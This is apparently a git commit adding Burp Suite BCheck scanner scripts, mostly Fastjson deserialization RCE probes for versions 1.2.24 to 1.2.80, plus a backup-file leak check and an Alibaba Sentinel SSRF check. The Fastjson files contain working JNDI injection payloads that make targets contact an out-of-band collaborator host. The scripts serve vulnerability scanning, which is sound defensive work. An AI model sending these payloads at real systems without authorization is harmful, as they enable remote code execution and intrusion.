Added RCE exploits for multiple Fastjson versions and Alibaba sentinel SSRF

other/WebBackup Exposed.bcheck

@@ -0,0 +1,35 @@
+metadata:
+  language: v1-beta
+  name: "WebBackup Exposed"
+  description: "The website has detected a backup file leak."
+  author: "JaveleyQAQ"
+  tags: "Leak", "Exposed"
+
+run for each:
+  url_array = 
+    `/{base.request.url.host}.bak`,
+    `/{base.request.url.host}.rar`,
+    `/{base.request.url.host}.zip`,
+    "/web.rar",
+    "/web.zip",
+    "/wwwroot.rar",
+    "/wwwroot.zip",
+    "/data.bak",
+    "/db.rar",
+    "/db.zip",
+    "/db.bak",
+    "/backup.zip"
+
+
+given host then
+  send request called check:
+    method: "GET"
+    path: {url_array}
+
+  if {check.response.status_code} is "200" and ("application/zip" in {check.response.headers} or "application/x-rar-compressed" in {check.response.headers} or "application/octet-stream" in {check.response.headers}) then
+    report issue:
+      severity: high
+      confidence: tentative
+      detail: "The website has detected a backup file leak. Please perform a manual inspection."
+      remediation: "none"
+  end if

other/exposed-swagger-ui.bcheck

@@ -83,7 +83,7 @@ run for each:
 given host then
   send request called checkSwagger:
     method: "GET"
-    replacing path: {potential_path}
+    replacing path: `/{potential_path}`
     headers:
       "Accept": "text/html"
 

other/fastjson/Fastjson-1.2.24-Deserialization-RCE.bcheck

@@ -0,0 +1,24 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.24 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload = 
+        `\{"b":\{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}}`
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.41-Deserialization-RCE.bcheck

@@ -0,0 +1,23 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.41 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload = `\{"@type":"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}`
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.42-Deserialization-RCE.bcheck

@@ -0,0 +1,25 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.42 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    # payload = `\{"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/a","autoCommit":true}`
+    payload = `\{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}", "autoCommit":true}`
+
+given request then
+
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.43-Deserialization-RCE.bcheck

@@ -0,0 +1,23 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.43 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload = `\{"rand1":"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}`
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.47-Deserialization-RCE.bcheck

@@ -0,0 +1,24 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.47 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload = `\{"a":\{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":\{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}}`
+
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.62-Deserialization-RCE.bcheck

@@ -0,0 +1,23 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.62 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload = `\{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.67-Deserialization-RCE.bcheck

@@ -0,0 +1,23 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.67 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload = `\{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":\{"@type":"java.util.Properties","UserTransaction":"rmi://{generate_collaborator_address()}/{random_str(4)}"}}`
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.68-Deserialization-RCE.bcheck

@@ -0,0 +1,26 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.68 Deserialization RCE"
+  description: "https://paper.seebug.org/1192/"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+run for each:
+    payload = 
+      `\{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`,
+      `\{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`,
+      `\{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`
+
+given request then
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "https://paper.seebug.org/1192/."
+              remediation: "https://paper.seebug.org/1192/."
+      end if 
+  end if

other/fastjson/Fastjson-1.2.80-Deserialization-RCE.bcheck

@@ -0,0 +1,25 @@
+metadata:
+  language: v1-beta
+  name: "Fastjson 1.2.80 Deserialization RCE"
+  description: "https://github.com/su18/hack-fastjson-1.2.80"
+  author: "Javeley"
+  tags: "Fastjson", "Deserialization","RCE","Alibaba"
+
+define:
+    payload =`[\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{generate_collaborator_address()}/{random_str(4)}"}}},\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{generate_collaborator_address()}/{random_str(4)}"}}}]`
+
+
+given request then
+
+  if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
+      send request:
+          body: {payload}
+
+      if dns interactions then
+          report issue:
+              severity: high
+              confidence: certain
+              detail: "If two DNS requests are received, it proves version 1.2.83 is used. If one DNS request is received, it proves version 1.2.80 is used.https://github.com/su18/hack-fastjson-1.2.80."
+              remediation: ""
+      end if 
+  end if

other/sentinel/Alibaba-Sentinel-SSRF.bcheck

@@ -0,0 +1,32 @@
+metadata:
+    language: v1-beta
+    name: "Alibaba Sentinel SSRF "
+    description: "Alibaba Sentinel 1.8.2 is vulnerable to Server-side request forgery (SSRF)."
+    author: "Javeley"
+    tags: "SSRF", "CVE-2021-44139","Alibaba"
+
+define:
+    ssrf_path=`/registry/machine?app={random_str(5)}&appType=0&version=0&hostname={random_str(5)}&ip={generate_collaborator_address()}&port=0`
+
+given host then
+    send request:
+        method: "GET"
+        path: {ssrf_path}
+    if dns interactions then
+        if http interactions then
+            report issue:
+                severity: high
+                confidence: firm
+                detail: `CVE-2021-44139. Sentinel before 1.8.3 is vulnerable to Server-side request forgery (SSRF). You can access host/version to view the Sentinel version.  fofa body="sentinelDashboardApp"`
+                remediation: "https://github.com/alibaba/Sentinel/issues/2451"
+        else then 
+            report issue:
+                severity: high
+                confidence: firm
+                detail: `CVE-2021-44139. Sentinel before 1.8.3 is vulnerable to Server-side request forgery (SSRF). You can access host/version to view the Sentinel version.  fofa body="sentinelDashboardApp"`
+                remediation: "https://github.com/alibaba/Sentinel/issues/2451"
+				end if
+    end if
+
+
+